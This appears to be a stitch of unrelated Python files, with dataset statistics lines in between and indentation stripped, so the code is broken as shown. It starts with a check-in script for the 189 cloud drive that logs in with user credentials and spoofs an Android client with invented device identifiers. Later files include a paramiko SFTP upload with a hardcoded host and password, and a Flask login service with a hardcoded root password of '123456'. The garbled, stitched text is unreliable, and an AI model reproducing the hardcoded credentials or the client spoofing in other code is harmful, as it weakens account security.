username = input("账号:")
password = input("密码:")
def main():
login(username, password)
rand = str(round(time.time()*1000))
surl = f'https://api.cloud.189.cn/mkt/userSign.action?rand={rand}&clientType=TELEANDROID&version=8.6.3&model=SM-G930K'
url = f'https://m.cloud.189.cn/v2/drawPrizeMarketDetails.action?taskId=TASK_SIGNIN&activityId=ACT_SIGNIN'
url2 = f'https://m.cloud.189.cn/v2/drawPrizeMarketDetails.action?taskId=TASK_SIGNIN_PHOTOS&activityId=ACT_SIGNIN'
headers = {
'User-Agent':'Mozilla/5.0 (Linux; Android 5.1.1; SM-G930K Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.136 Mobile Safari/537.36 Ecloud/8.6.3 Android/22 clientId/355325117317828 clientModel/SM-G930K imsi/460071114317824 clientChannelId/qq proVersion/1.0.6',
"Referer" : "https://m.cloud.189.cn/zhuanti/2016/sign/index.jsp?albumBackupOpened=1",
"Host" : "m.cloud.189.cn",
"Accept-Encoding" : "gzip, deflate",
}
response = s.get(surl,headers=headers)
netdiskBonus = response.json()['netdiskBonus']
if(response.json()['isSign'] == "false"):
print(f"未签到,签到获得{netdiskBonus}M空间")
else:
print(f"已经签到过了,签到获得{netdiskBonus}M空间")
headers = {
'User-Agent':'Mozilla/5.0 (Linux; Android 5.1.1; SM-G930K Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.136 Mobile Safari/537.36 Ecloud/8.6.3 Android/22 clientId/355325117317828 clientModel/SM-G930K imsi/460071114317824 clientChannelId/qq proVersion/1.0.6',
"Referer" : "https://m.cloud.189.cn/zhuanti/2016/sign/index.jsp?albumBackupOpened=1",
"Host" : "m.cloud.189.cn",
"Accept-Encoding" : "gzip, deflate",
}
response = s.get(url,headers=headers)
try:
if ("errorCode" in response.text):
print(response.json()['errorCode'])
elif (response.json().has_key('description')):
description = response.json()['description']
print(f"抽奖获得{description}")
except:
print(f"抽奖1完成,解析时失败")
try:
response2 = s.get(url2,headers=headers)
if ("errorCode" in response2.text):
print(response.json()['errorCode'])
elif (response2.json().has_key('description')):
description = response2.json()['description']
print(f"抽奖2获得{description}")
except:
print(f"抽奖2完成,解析时失败")
BI_RM = list("0123456789abcdefghijklmnopqrstuvwxyz")
def int2char(a):
return BI_RM[a]
b64map = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
def b64tohex(a):
d = ""
e = 0
c = 0
for i in range(len(a)):
if list(a)[i] != "=":
v = b64map.index(list(a)[i])
if 0 == e:
e = 1
d += int2char(v >> 2)
c = 3 & v
elif 1 == e:
e = 2
d += int2char(c << 2 | v >> 4)
c = 15 & v
elif 2 == e:
e = 3
d += int2char(c)
d += int2char(v >> 2)
c = 3 & v
else:
e = 0
d += int2char(c << 2 | v >> 4)
d += int2char(15 & v)
if e == 1:
d += int2char(c << 2)
return d
def rsa_encode(j_rsakey, string):
rsa_key = f"-----BEGIN PUBLIC KEY-----\n{j_rsakey}\n-----END PUBLIC KEY-----"
pubkey = rsa.PublicKey.load_pkcs1_openssl_pem(rsa_key.encode())
result = b64tohex((base64.b64encode(rsa.encrypt(f'{string}'.encode(), pubkey))).decode())
return result
def calculate_md5_sign(params):
return hashlib.md5('&'.join(sorted(params.split('&'))).encode('utf-8')).hexdigest()
def login(username, password):
url = "https://cloud.189.cn/udb/udb_login.jsp?pageId=1&redirectURL=/main.action"
r = s.get(url)
captchaToken = re.findall(r"captchaToken' value='(.+?)'", r.text)[0]
lt = re.findall(r'lt = "(.+?)"', r.text)[0]
returnUrl = re.findall(r"returnUrl = '(.+?)'", r.text)[0]
paramId = re.findall(r'paramId = "(.+?)"', r.text)[0]
j_rsakey = re.findall(r'j_rsaKey" value="(\S+)"', r.text, re.M)[0]
s.headers.update({"lt": lt})
username = rsa_encode(j_rsakey, username)
password = rsa_encode(j_rsakey, password)
url = "https://open.e.189.cn/api/logbox/oauth2/loginSubmit.do"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/76.0',
'Referer': 'https://open.e.189.cn/',
}
data = {
"appKey": "cloud",
"accountType": '01',
"userName": f"{{RSA}}{username}",
"password": f"{{RSA}}{password}",
"validateCode": "",
"captchaToken": captchaToken,
"returnUrl": returnUrl,
"mailSuffix": "@189.cn",
"paramId": paramId
}
r = s.post(url, data=data, headers=headers, timeout=5)
if(r.json()['result'] == 0):
print(r.json()['msg'])
else:
print(r.json()['msg'])
redirect_url = r.json()['toUrl']
r = s.get(redirect_url)
return s
if __name__ == "__main__":
main()
| 37.707143
| 305
| 0.586664
| 683
| 5,279
| 4.481698
| 0.311859
| 0.017968
| 0.026135
| 0.021562
| 0.352499
| 0.32179
| 0.282914
| 0.273767
| 0.273767
| 0.273767
| 0
| 0.07761
| 0.23603
| 5,279
| 139
| 306
| 37.978417
| 0.681379
| 0
| 0
| 0.24
| 0
| 0.072
| 0.385111
| 0.043758
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048
| false
| 0.056
| 0.016
| 0.016
| 0.104
| 0.08
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
92f8d1944416ddff1cb95f31ed4c8d93f364c956
| 5,193
|
py
|
Python
|
src/nebulo/gql/alias.py
|
olirice/nebulo
|
de9b043fe66d0cb872c5c0f2aca3c5c6f20918a7
|
[
"MIT"
] | 76
|
2020-04-03T01:21:47.000Z
|
2021-12-06T02:54:53.000Z
|
src/nebulo/gql/alias.py
|
olirice/nebulo
|
de9b043fe66d0cb872c5c0f2aca3c5c6f20918a7
|
[
"MIT"
] | 7
|
2020-04-06T04:44:10.000Z
|
2021-05-17T12:38:15.000Z
|
src/nebulo/gql/alias.py
|
olirice/nebulo
|
de9b043fe66d0cb872c5c0f2aca3c5c6f20918a7
|
[
"MIT"
] | 2
|
2020-10-23T10:25:16.000Z
|
2020-10-28T14:16:57.000Z
|
# pylint: disable=missing-class-docstring,invalid-name
import typing
from graphql.language import (
InputObjectTypeDefinitionNode,
InputObjectTypeExtensionNode,
ObjectTypeDefinitionNode,
ObjectTypeExtensionNode,
)
from graphql.type import (
GraphQLArgument,
GraphQLBoolean,
GraphQLEnumType,
GraphQLEnumValue,
GraphQLField,
GraphQLFieldMap,
GraphQLFloat,
GraphQLID,
GraphQLInputFieldMap,
GraphQLInputObjectType,
GraphQLInt,
GraphQLInterfaceType,
GraphQLIsTypeOfFn,
GraphQLList,
GraphQLNonNull,
GraphQLObjectType,
GraphQLResolveInfo,
GraphQLScalarType,
GraphQLSchema,
GraphQLString,
GraphQLType,
Thunk,
)
from graphql.type.definition import GraphQLInputFieldOutType
from nebulo.sql.composite import CompositeType as SQLACompositeType
# Handle name changes from graphql-core and graphql-core-next
try:
from graphql.type import GraphQLInputObjectField as GraphQLInputField
except ImportError:
from graphql.type import GraphQLInputField
Type = GraphQLType
List = GraphQLList
NonNull = GraphQLNonNull
Argument = GraphQLArgument
Boolean = GraphQLBoolean
String = GraphQLString
ScalarType = GraphQLScalarType
ID = GraphQLID
InterfaceType = GraphQLInterfaceType
Int = GraphQLInt
InputField = GraphQLInputField
ResolveInfo = GraphQLResolveInfo
EnumType = GraphQLEnumType
EnumValue = GraphQLEnumValue
Schema = GraphQLSchema
Field = GraphQLField
Float = GraphQLFloat
EnumType = GraphQLEnumType
class HasSQLAModel: # pylint: disable= too-few-public-methods
sqla_table = None
class HasSQLFunction: # pylint: disable= too-few-public-methods
sql_function = None
class HasSQLAComposite: # pylint: disable= too-few-public-methods
sqla_composite: SQLACompositeType
class ObjectType(GraphQLObjectType, HasSQLAModel):
def __init__(
self,
name: str,
fields: Thunk[GraphQLFieldMap],
interfaces: typing.Optional[Thunk[typing.Collection["GraphQLInterfaceType"]]] = None,
is_type_of: typing.Optional[GraphQLIsTypeOfFn] = None,
extensions: typing.Optional[typing.Dict[str, typing.Any]] = None,
description: typing.Optional[str] = None,
ast_node: typing.Optional[ObjectTypeDefinitionNode] = None,
extension_ast_nodes: typing.Optional[typing.Collection[ObjectTypeExtensionNode]] = None,
sqla_model=None,
) -> None:
super().__init__(
name=name,
fields=fields,
interfaces=interfaces,
is_type_of=is_type_of,
extensions=extensions,
description=description,
ast_node=ast_node,
extension_ast_nodes=extension_ast_nodes,
)
self.sqla_model = sqla_model
class ConnectionType(ObjectType):
pass
class EdgeType(ObjectType):
pass
class TableType(ObjectType):
pass
class CompositeType(ObjectType, HasSQLAComposite):
pass
class MutationPayloadType(ObjectType):
pass
class CreatePayloadType(MutationPayloadType):
pass
class UpdatePayloadType(MutationPayloadType):
pass
class DeletePayloadType(MutationPayloadType):
pass
class FunctionPayloadType(MutationPayloadType, HasSQLFunction):
pass
class InputObjectType(GraphQLInputObjectType, HasSQLAModel):
def __init__(
self,
name: str,
fields: Thunk[GraphQLInputFieldMap],
description: typing.Optional[str] = None,
out_type: typing.Optional[GraphQLInputFieldOutType] = None,
extensions: typing.Optional[typing.Dict[str, typing.Any]] = None,
ast_node: typing.Optional[InputObjectTypeDefinitionNode] = None,
extension_ast_nodes: typing.Optional[typing.Collection[InputObjectTypeExtensionNode]] = None,
sqla_model=None,
) -> None:
super().__init__(
name=name,
fields=fields,
description=description,
out_type=out_type,
extensions=extensions,
ast_node=ast_node,
extension_ast_nodes=extension_ast_nodes,
)
self.sqla_model = sqla_model
class CreateInputType(InputObjectType):
pass
class TableInputType(InputObjectType):
pass
class UpdateInputType(InputObjectType):
pass
class DeleteInputType(InputObjectType):
pass
class FunctionInputType(GraphQLInputObjectType):
def __init__(
self,
name: str,
fields: Thunk[GraphQLInputFieldMap],
description: typing.Optional[str] = None,
out_type: typing.Optional[GraphQLInputFieldOutType] = None,
extensions: typing.Optional[typing.Dict[str, typing.Any]] = None,
ast_node: typing.Optional[InputObjectTypeDefinitionNode] = None,
extension_ast_nodes: typing.Optional[typing.Collection[InputObjectTypeExtensionNode]] = None,
sql_function=None,
) -> None:
super().__init__(
name=name,
fields=fields,
description=description,
out_type=out_type,
extensions=extensions,
ast_node=ast_node,
extension_ast_nodes=extension_ast_nodes,
)
self.sql_function = sql_function
| 25.965
| 101
| 0.706913
| 457
| 5,193
| 7.868709
| 0.26477
| 0.062291
| 0.042547
| 0.017519
| 0.385984
| 0.371246
| 0.362347
| 0.342325
| 0.313404
| 0.313404
| 0
| 0
| 0.220104
| 5,193
| 199
| 102
| 26.095477
| 0.887901
| 0.044676
| 0
| 0.43871
| 0
| 0
| 0.004036
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019355
| false
| 0.083871
| 0.051613
| 0
| 0.212903
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
131342de18ae50cff3d8d09f0b5c640ef367d9c5
| 997
|
py
|
Python
|
tests/test_dcd_api.py
|
sadamek/pyIMX
|
52af15e656b400f0812f16cf31d9bf6edbe631ad
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_dcd_api.py
|
sadamek/pyIMX
|
52af15e656b400f0812f16cf31d9bf6edbe631ad
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_dcd_api.py
|
sadamek/pyIMX
|
52af15e656b400f0812f16cf31d9bf6edbe631ad
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2017-2018 Martin Olejar
#
# SPDX-License-Identifier: BSD-3-Clause
# The BSD-3-Clause license for this file can be found in the LICENSE file included with this distribution
# or at https://spdx.org/licenses/BSD-3-Clause.html#licenseText
import os
import pytest
from imx import img
# Used Directories
DATA_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data')
# Test Files
DCD_TXT = os.path.join(DATA_DIR, 'dcd_test.txt')
DCD_BIN = os.path.join(DATA_DIR, 'dcd_test.bin')
def setup_module(module):
# Prepare test environment
pass
def teardown_module(module):
# Clean test environment
pass
def test_txt_parser():
with open(DCD_TXT, 'r') as f:
dcd_obj = img.SegDCD.parse_txt(f.read())
assert dcd_obj is not None
assert len(dcd_obj) == 12
def test_bin_parser():
with open(DCD_BIN, 'rb') as f:
dcd_obj = img.SegDCD.parse(f.read())
assert dcd_obj is not None
assert len(dcd_obj) == 12
| 22.155556
| 105
| 0.691073
| 162
| 997
| 4.092593
| 0.450617
| 0.054299
| 0.045249
| 0.042232
| 0.271493
| 0.271493
| 0.271493
| 0.129713
| 0.129713
| 0.129713
| 0
| 0.01875
| 0.197593
| 997
| 44
| 106
| 22.659091
| 0.81
| 0.316951
| 0
| 0.3
| 0
| 0
| 0.046269
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.2
| false
| 0.1
| 0.15
| 0
| 0.35
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
1335675a9f3e2654ba5bacc0a704284147b3d912
| 2,518
|
py
|
Python
|
tests/test_get_set.py
|
snoopyjc/ssf
|
b995cae0e90d38e3758d4944fb144831f9bae0a5
|
[
"Apache-2.0"
] | 3
|
2020-10-07T18:28:12.000Z
|
2020-10-09T15:24:53.000Z
|
tests/test_get_set.py
|
snoopyjc/ssf
|
b995cae0e90d38e3758d4944fb144831f9bae0a5
|
[
"Apache-2.0"
] | 15
|
2020-10-09T15:23:03.000Z
|
2020-10-29T04:34:17.000Z
|
tests/test_get_set.py
|
snoopyjc/ssf
|
b995cae0e90d38e3758d4944fb144831f9bae0a5
|
[
"Apache-2.0"
] | null | null | null |
from ssf import SSF
ssf = SSF(errors='raise')
def test_get_set_days():
dn = ssf.get_day_names()
assert isinstance(dn, tuple)
assert dn == (('Mon', 'Monday'),
('Tue', 'Tuesday'),
('Wed', 'Wednesday'),
('Thu', 'Thursday'),
('Fri', 'Friday'),
('Sat', 'Saturday'),
('Sun', 'Sunday'))
ssf.set_day_names([['MO', 'MON'],
('TU', 'TUE'), ['WE', 'WED'],
('TH', 'THU'), ['FR', 'FRI'],
('SA', 'SAT'), ['SU', 'SUN']])
assert ssf.format('ddd dddd', '10/3/2020') == 'SA SAT'
assert ssf.format('ddd dddd', '10/4/2020') == 'SU SUN'
assert ssf.format('ddd dddd', '10/5/2020') == 'MO MON'
assert ssf.format('ddd dddd', '10/6/2020') == 'TU TUE'
assert ssf.format('ddd dddd', '10/7/2020') == 'WE WED'
assert ssf.format('ddd dddd', '10/8/2020') == 'TH THU'
assert ssf.format('ddd dddd', '10/9/2020') == 'FR FRI'
try:
ssf.set_day_names(2)
assert False # Failed
except ValueError:
pass
try:
ssf.set_day_names((1, 2, 3, 4, 5, 6, 7))
assert False # Failed
except ValueError:
pass
def test_get_set_months():
mn = ssf.get_month_names()
assert isinstance(mn, tuple)
assert mn == (None, ('J', 'Jan', 'January'), ('F', 'Feb', 'February'), ('M', 'Mar', 'March'),
('A', 'Apr', 'April'), ('M', 'May', 'May'), ('J', 'Jun', 'June'), ('J', 'Jul', 'July'),
('A', 'Aug', 'August'), ('S', 'Sep', 'September'), ('O', 'Oct', 'October'),
('N', 'Nov', 'November'), ('D', 'Dec', 'December'))
ssf.set_month_names(mn[:-1] + (('X', 'DE', 'DEC'),) )
assert ssf.format('mmmmm mmm mmmm', '12/3/2020') == 'X DE DEC'
try:
ssf.set_month_names(2)
assert False # Failed
except ValueError:
pass
try:
ssf.set_month_names((0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12))
assert False # Failed
except ValueError:
pass
def test_get_load_table():
t = ssf.get_table()
assert t[0] == 'General'
assert t[1] == '0'
assert t[14] == 'm/d/yyyy'
assert t[49] == '@'
ssf.load_table({104:'yyyy-mm-dd', 105:'0.0'})
assert ssf.format(104, '10/6/2020') == '2020-10-06'
assert ssf.format(105, 3.4) == '3.4'
assert ssf.load('0') == 1
assert ssf.load('mmm mmmm') == 5 # Will be inserted at 5
assert ssf.load('@') == 49
assert ssf.format(5, '10/6/2020') == 'Oct October'
| 31.475
| 100
| 0.496029
| 349
| 2,518
| 3.501433
| 0.332378
| 0.10311
| 0.135025
| 0.10311
| 0.355155
| 0.319149
| 0.220949
| 0.209493
| 0.162029
| 0.085106
| 0
| 0.074849
| 0.278396
| 2,518
| 79
| 101
| 31.873418
| 0.597689
| 0.01946
| 0
| 0.246154
| 0
| 0
| 0.208283
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.046154
| false
| 0.061538
| 0.015385
| 0
| 0.061538
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
1368b793b823b3bd0b461ed385d6e6b6434e1e68
| 3,455
|
py
|
Python
|
scripts/dev/dockerutil.py
|
axelbarjon/mongodb-kubernetes-operator
|
13eb844c55774ce8a6de51edde1a66b4371f3ef6
|
[
"RSA-MD"
] | 1
|
2021-03-24T17:54:51.000Z
|
2021-03-24T17:54:51.000Z
|
scripts/dev/dockerutil.py
|
axelbarjon/mongodb-kubernetes-operator
|
13eb844c55774ce8a6de51edde1a66b4371f3ef6
|
[
"RSA-MD"
] | 18
|
2021-03-08T13:38:37.000Z
|
2022-02-14T15:06:28.000Z
|
scripts/dev/dockerutil.py
|
axelbarjon/mongodb-kubernetes-operator
|
13eb844c55774ce8a6de51edde1a66b4371f3ef6
|
[
"RSA-MD"
] | 1
|
2021-03-25T13:37:02.000Z
|
2021-03-25T13:37:02.000Z
|
import docker
from dockerfile_generator import render
import os
import json
from tqdm import tqdm
from typing import Union, Any, Optional
def build_image(repo_url: str, tag: str, path: str) -> None:
"""
build_image builds the image with the given tag
"""
client = docker.from_env()
print(f"Building image: {tag}")
client.images.build(tag=tag, path=path)
print("Successfully built image!")
def push_image(tag: str) -> None:
"""
push_image pushes the given tag. It uses
the current docker environment
"""
client = docker.from_env()
print(f"Pushing image: {tag}")
with tqdm(total=100, ascii=False) as progress_bar:
last_percent = 0.0
for line in client.images.push(tag, stream=True):
percent = get_completion_percentage(line)
if percent:
progress_bar.update(percent - last_percent)
last_percent = percent
def retag_image(
old_repo_url: str,
new_repo_url: str,
old_tag: str,
new_tag: str,
path: str,
labels: Optional[dict] = None,
username: Optional[str] = None,
password: Optional[str] = None,
registry: Optional[str] = None,
) -> None:
with open(f"{path}/Dockerfile", "w") as f:
f.write(f"FROM {old_repo_url}:{old_tag}")
client = docker.from_env()
if all(value is not None for value in [username, password, registry]):
client.login(username=username, password=password, registry=registry)
image, _ = client.images.build(path=f"{path}", labels=labels, tag=new_tag)
image.tag(new_repo_url, new_tag)
os.remove(f"{path}/Dockerfile")
# We do not want to republish an image that has not changed, so we check if the new
# pair repo:tag already exists.
try:
image = client.images.pull(new_repo_url, new_tag)
return
# We also need to catch APIError as if the image has been recently deleted (uncommon, but might happen?)
# we will get this kind of error:
# docker.errors.APIError: 500 Server Error: Internal Server Error
# ("unknown: Tag <tag> was deleted or has expired. To pull, revive via time machine"
except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
pass
print(f"Pushing to {new_repo_url}:{new_tag}")
client.images.push(new_repo_url, new_tag)
def get_completion_percentage(line: Any) -> float:
try:
line = json.loads(line.strip().decode("utf-8"))
except ValueError:
return 0
to_skip = ("Preparing", "Waiting", "Layer already exists")
if "status" in line:
if line["status"] in to_skip:
return 0
if line["status"] == "Pushing":
try:
current = float(line["progressDetail"]["current"])
total = float(line["progressDetail"]["total"])
except KeyError:
return 0
result = (current / total) * 100
if result > 100.0:
return 100.0
return result
return 0
def build_and_push_image(repo_url: str, tag: str, path: str, image_type: str) -> None:
"""
build_and_push_operator creates the Dockerfile for the operator
and pushes it to the target repo
"""
dockerfile_text = render(image_type, ["."])
with open(f"{path}/Dockerfile", "w") as f:
f.write(dockerfile_text)
build_image(repo_url, tag, path)
os.remove(f"{path}/Dockerfile")
push_image(tag)
| 32.28972
| 108
| 0.636758
| 473
| 3,455
| 4.528541
| 0.312896
| 0.03268
| 0.023343
| 0.024276
| 0.143324
| 0.080299
| 0.056956
| 0.056956
| 0.030812
| 0.030812
| 0
| 0.009292
| 0.252388
| 3,455
| 106
| 109
| 32.59434
| 0.819977
| 0.176845
| 0
| 0.189189
| 0
| 0
| 0.112388
| 0.017235
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067568
| false
| 0.054054
| 0.081081
| 0
| 0.243243
| 0.054054
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
138b01aa9774bbead45a8dac1264c5149cf9f912
| 568
|
py
|
Python
|
Section 20/2.Document-transfer_files.py
|
airbornum/-Complete-Python-Scripting-for-Automation
|
bc053444f8786259086269ca1713bdb10144dd74
|
[
"MIT"
] | 18
|
2020-04-13T03:14:06.000Z
|
2022-03-09T18:54:41.000Z
|
Section 20/2.Document-transfer_files.py
|
airbornum/-Complete-Python-Scripting-for-Automation
|
bc053444f8786259086269ca1713bdb10144dd74
|
[
"MIT"
] | null | null | null |
Section 20/2.Document-transfer_files.py
|
airbornum/-Complete-Python-Scripting-for-Automation
|
bc053444f8786259086269ca1713bdb10144dd74
|
[
"MIT"
] | 22
|
2020-04-29T21:12:42.000Z
|
2022-03-17T18:19:54.000Z
|
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname='54.165.97.91',username='ec2-user',password='paramiko123',port=22)
sftp_client=ssh.open_sftp()
#sftp_client.get('/home/ec2-user/paramiko_download.txt','paramiko_downloaded_file.txt')
#sftp_client.chdir("/home/ec2-user")
#print(sftp_client.getcwd())
#sftp_client.get('demo.txt','C:\\Users\\Automation\\Desktop\\download_file.txt')
sftp_client.put("transfer_files.py",'/home/ec2-user/transfer_files.py')
sftp_client.close()
ssh.close()
| 43.692308
| 88
| 0.769366
| 84
| 568
| 4.988095
| 0.535714
| 0.167064
| 0.078759
| 0.081146
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033272
| 0.047535
| 568
| 13
| 89
| 43.692308
| 0.74122
| 0.399648
| 0
| 0
| 0
| 0
| 0.245399
| 0.09816
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.125
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
139af14f3890b6a5fdebd9bc833f815258ac26c3
| 1,433
|
py
|
Python
|
tests/adv/test_pop_sfrd.py
|
jlashner/ares
|
6df2b676ded6bd59082a531641cb1dadd475c8a8
|
[
"MIT"
] | 10
|
2020-03-26T01:08:10.000Z
|
2021-12-04T13:02:10.000Z
|
tests/adv/test_pop_sfrd.py
|
jlashner/ares
|
6df2b676ded6bd59082a531641cb1dadd475c8a8
|
[
"MIT"
] | 25
|
2020-06-08T14:52:28.000Z
|
2022-03-08T02:30:54.000Z
|
tests/adv/test_pop_sfrd.py
|
jlashner/ares
|
6df2b676ded6bd59082a531641cb1dadd475c8a8
|
[
"MIT"
] | 8
|
2020-03-24T14:11:25.000Z
|
2021-11-06T06:32:59.000Z
|
"""
test_pop_models.py
Author: Jordan Mirocha
Affiliation: UCLA
Created on: Fri Jul 15 15:23:11 PDT 2016
Description:
"""
import ares
import matplotlib.pyplot as pl
PB = ares.util.ParameterBundle
def test():
# Create a simple population
pars_1 = PB('pop:fcoll') + PB('sed:bpass')
pop_fcoll = ares.populations.GalaxyPopulation(**pars_1)
#pop_fcoll_XR = ares.populations.GalaxyPopulation(**pars_1)
# Mimic the above population to check our different SFRD/SED techniques
sfrd_pars = {'pop_sfr_model': 'sfrd-func'}
sfrd_pars['pop_sfrd'] = pop_fcoll.SFRD
sfrd_pars['pop_sfrd_units'] = 'internal'
sed = PB('sed:toy')
sed['pop_Nion'] = pop_fcoll.src.Nion
sed['pop_Nlw'] = pop_fcoll.src.Nlw
# pop_Ex?
sed['pop_ion_src_igm'] = False
sed['pop_heat_src_igm'] = False
pars_2 = sed + sfrd_pars
pop_sfrd = ares.populations.GalaxyPopulation(**pars_2)
assert pop_fcoll.SFRD(20.) == pop_sfrd.SFRD(20.), "Error in SFRD."
# Check the emissivities too
#print(pop_fcoll.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6))
#print(pop_sfrd.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6))
#assert pop_fcoll.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6) \
# == pop_sfrd.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6), \
# "Error in photon luminosity density."
if __name__ == '__main__':
test()
| 25.589286
| 75
| 0.669923
| 203
| 1,433
| 4.502463
| 0.413793
| 0.078775
| 0.04814
| 0.135667
| 0.282276
| 0.203501
| 0.203501
| 0.203501
| 0.203501
| 0.203501
| 0
| 0.046007
| 0.196092
| 1,433
| 55
| 76
| 26.054545
| 0.747396
| 0.432659
| 0
| 0
| 0
| 0
| 0.183081
| 0
| 0
| 0
| 0
| 0
| 0.052632
| 1
| 0.052632
| false
| 0.052632
| 0.105263
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
139bcb633d3c2b224334dad0ddfc97013f3a8ff8
| 918
|
py
|
Python
|
tests/test_app/rest_app/rest_app/services/account_service.py
|
jadbin/guniflask
|
36253a962c056abf34884263c6919b02b921ad9c
|
[
"MIT"
] | 12
|
2018-09-06T06:14:59.000Z
|
2021-04-18T06:30:44.000Z
|
tests/test_app/rest_app/rest_app/services/account_service.py
|
jadbin/guniflask
|
36253a962c056abf34884263c6919b02b921ad9c
|
[
"MIT"
] | null | null | null |
tests/test_app/rest_app/rest_app/services/account_service.py
|
jadbin/guniflask
|
36253a962c056abf34884263c6919b02b921ad9c
|
[
"MIT"
] | 2
|
2019-09-08T22:01:26.000Z
|
2020-08-03T07:23:29.000Z
|
from flask import abort
from guniflask.context import service
from ..config.jwt_config import jwt_manager
@service
class AccountService:
accounts = {
'root': {
'authorities': ['role_admin'],
'password': '123456',
}
}
def login(self, username: str, password: str):
if username not in self.accounts or self.accounts[username]['password'] != password:
return abort(403)
account = self.accounts[username]
token = jwt_manager.create_access_token(authorities=account['authorities'], username=username)
return {
'username': username,
'access_token': token,
}
def get(self, username: str):
if username not in self.accounts:
return abort(404)
return {
'username': username,
'authorities': self.accounts[username]['authorities']
}
| 27.818182
| 102
| 0.59695
| 91
| 918
| 5.945055
| 0.395604
| 0.110906
| 0.110906
| 0.05915
| 0.110906
| 0.110906
| 0.110906
| 0
| 0
| 0
| 0
| 0.018576
| 0.296296
| 918
| 32
| 103
| 28.6875
| 0.818885
| 0
| 0
| 0.148148
| 0
| 0
| 0.117647
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0.111111
| 0.111111
| 0
| 0.407407
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
13a92427a8cdec440aec42402a7483f2303b73a6
| 10,075
|
py
|
Python
|
json_to_relation/mysqldb.py
|
paepcke/json_to_relation
|
acfa58d540f8f51d1d913d0c173ee3ded1b6c2a9
|
[
"BSD-3-Clause"
] | 4
|
2015-10-10T19:09:49.000Z
|
2021-09-02T00:58:06.000Z
|
json_to_relation/mysqldb.py
|
paepcke/json_to_relation
|
acfa58d540f8f51d1d913d0c173ee3ded1b6c2a9
|
[
"BSD-3-Clause"
] | null | null | null |
json_to_relation/mysqldb.py
|
paepcke/json_to_relation
|
acfa58d540f8f51d1d913d0c173ee3ded1b6c2a9
|
[
"BSD-3-Clause"
] | 8
|
2015-05-16T14:33:33.000Z
|
2019-10-24T08:56:25.000Z
|
# Copyright (c) 2014, Stanford University
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
